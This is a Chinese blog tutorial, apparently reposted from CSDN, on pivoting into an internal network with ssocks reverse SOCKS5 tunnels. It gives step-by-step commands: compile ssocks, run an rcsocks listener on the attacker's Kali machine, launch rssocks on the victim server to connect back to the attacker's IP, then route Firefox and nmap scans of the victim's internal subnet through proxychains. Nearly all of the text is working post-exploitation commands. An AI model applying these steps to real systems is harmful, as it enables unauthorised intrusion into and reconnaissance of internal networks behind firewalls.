内网渗透思路02隧道技术之socket隧道

Socket的下载安装

下载地址:http://sourceforge.net/projects/ssocks/

受害者Linux服务器与攻击者的kali机器都需要下载socket文件(因为都不自带)

下载之后,cd进入socket目录,使用下面命令进行编译并生成一个文件:

./configure && make

反向连接

攻击机器kali开启监听

Cd到socket下src目录

./rcsocks -l 1088 -p 1080 -vv

//等待远程Socks5服务器访问本地1080端口,并将数据转达到本地端口1088 
//最后的 “ -vv ”是显示过程信息。

受害机器进行会话反弹

./rssocks -vv -s 192.168.0.115:1080

//192.168.0.115是攻击者的IP

利用proxychains进行Socks5代理

Ubuntu中安装proxychains的命令(kali自带不用装):

apt-get install proxychains

在kali里面修改” vim /etc/proxychains.conf “
注释掉socks4 127.0.0.1 9050
在最下方增加socks5 127.0.0.1 1088
代理火狐浏览器,来访问目标内网中10.10.10.128的机器

Proxychains firefox http://10.10.10.128

用kali 里面的nmap扫描 10.10.10.128

proxychains nmap –Pn -sT 10.10.10.128

//socks可以代理tcp流量,但是不能代理ping,因为ping使用的是icmp协议。
//-Pn 是非ping扫描,-sT是3次握手方式tcp的扫描
扫描整个内网

proxychains nmap –Pn -sT 10.10.10.0/24

扫描整个内网中的80端口

proxychains nmap –Pn -sT 10.10.10.0/24 -p 80

其他

Socks有socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,
	
还支持各种身份验证机制	等协议。其标准端口为1080。

补充:Socks支持ftp与http协议

猜你喜欢

转载自blog.csdn.net/weixin_43970718/article/details/114450166